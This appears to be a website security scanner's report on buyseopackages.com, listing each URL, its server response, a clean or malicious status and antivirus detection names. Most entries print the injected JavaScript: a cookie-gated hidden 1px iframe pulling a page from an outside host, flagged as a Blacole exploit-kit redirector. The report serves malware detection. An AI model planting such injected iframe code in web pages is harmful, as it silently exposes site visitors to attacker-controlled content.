Request | Server response | Status |
http://www.buyseopackages.com/ | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/scripts/cufon-yui.js | 200 OK Content-Length: 25674 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var vvnh = document.createElement('iframe'); vvnh.src = 'http://ipafmig.com/count24.php'; vvnh.style.position = 'absolute'; vvnh.style.border = '0'; vvnh.style.height = '1px'; vvnh.style.width = '1px'; vvnh.style.left = '1px'; vvnh.style.top = '1px'; if (!document.getElementById('vvnh')) { document.write('<div id=\'vvnh\'></div>'); document.getElementById('vvnh').appendChild(vvnh); }}function SetCookie(cookieName,cooki ...[805 bytes skipped]... Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- K7AntiVirus
- Riskware
- Kaspersky
- HEUR:Trojan.Script.Generic
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- GData
- JS:Iframe-AHU
- Commtouch
- JS/IFrame.RS.gen
|
http://www.buyseopackages.com/scripts/Rockwell_Std_400-Rockwell_Std_700.font.js | 200 OK Content-Length: 132281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var vvnh = document.createElement('iframe'); vvnh.src = 'http://ipafmig.com/count24.php'; vvnh.style.position = 'absolute'; vvnh.style.border = '0'; vvnh.style.height = '1px'; vvnh.style.width = '1px'; vvnh.style.left = '1px'; vvnh.style.top = '1px'; if (!document.getElementById('vvnh')) { document.write('<div id=\'vvnh\'></div>'); document.getElementById('vvnh').appendChild(vvnh); }}function SetCookie(cookieName,cooki ...[805 bytes skipped]... Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- K7AntiVirus
- Riskware
- Kaspersky
- HEUR:Trojan.Script.Generic
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- GData
- JS:Iframe-AHU
- Commtouch
- JS/IFrame.RS.gen
|
http://www.buyseopackages.com/scripts/cufon-replace.js | 200 OK Content-Length: 7552 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var vvnh = document.createElement('iframe'); vvnh.src = 'http://ipafmig.com/count24.php'; vvnh.style.position = 'absolute'; vvnh.style.border = '0'; vvnh.style.height = '1px'; vvnh.style.width = '1px'; vvnh.style.left = '1px'; vvnh.style.top = '1px'; if (!document.getElementById('vvnh')) { document.write('<div id=\'vvnh\'></div>'); document.getElementById('vvnh').appendChild(vvnh); }}function SetCookie(cookieName,cooki ...[805 bytes skipped]... Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Iframe-AHU [Trj]
- K7AntiVirus
- Riskware
- Kaspersky
- HEUR:Trojan.Script.Generic
- Fortinet
- JS/Iframe.DCV!tr.dldr
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.QH
- GData
- JS:Iframe-AHU
- Commtouch
- JS/IFrame.RS.gen
|
http://www.buyseopackages.com/index.php | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/packages.php | 200 OK Content-Length: 21100 Content-Type: text/html | clean |
http://www.buyseopackages.com/contact.php | 200 OK Content-Length: 7693 Content-Type: text/html | clean |
http://www.buyseopackages.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.buyseopackages.com/?t=add&p=1 | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/?t=add&p=2 | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/?t=add&p=3 | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/?t=add&p=4 | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/?t=add&p=5 | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/?t=add&p=6 | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|
http://www.buyseopackages.com/?t=add&p=7 | 200 OK Content-Length: 11400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var ik = document.createElement('iframe'); ik.src = 'http://ipafmig.com/count24.php'; ik.style.position = 'absolute'; ik.style.border = '0'; ik.style.height = '1px'; ik.style.width = '1px'; ik.style.left = '1px'; ik.style.top = '1px'; if (!document.getElementById('ik')) { document.write('<div id=\'ik\'></div>'); document.getElementById('ik').appendChild(ik); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}Antivirus reports:- AntiVir
- JS/iFrame.kpp
- Avast
- JS:Iframe-CSU [Trj]
- Ad-Aware
- Trojan.JS.Iframe.DEE
- Bkav
- MW.Clod71c.Trojan.4470
- Ikarus
- Virus.HTML.Framer
- Rising
- JS:Script.JS.Quidvetis.a!1612922
- nProtect
- Trojan.JS.Iframe.DEE
- K7AntiVirus
- Riskware ( 885143830 )
- Comodo
- Exploit.JS.Blacole.LI
- Emsisoft
- Trojan.JS.Iframe.DEE (B)
- K7GW
- Exploit ( 04c551131 )
- McAfee-GW-Edition
- JS/Iframe.gen.p
- DrWeb
- JS.IFrame.471
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.DEE
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Iframe.gen.p
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- Trojan.JS.Iframe.DEE
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.XE
- Sophos
- Troj/Iframe-JH
- GData
- Trojan.JS.Iframe.DEE
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- Trojan.JS.Iframe.DEE
|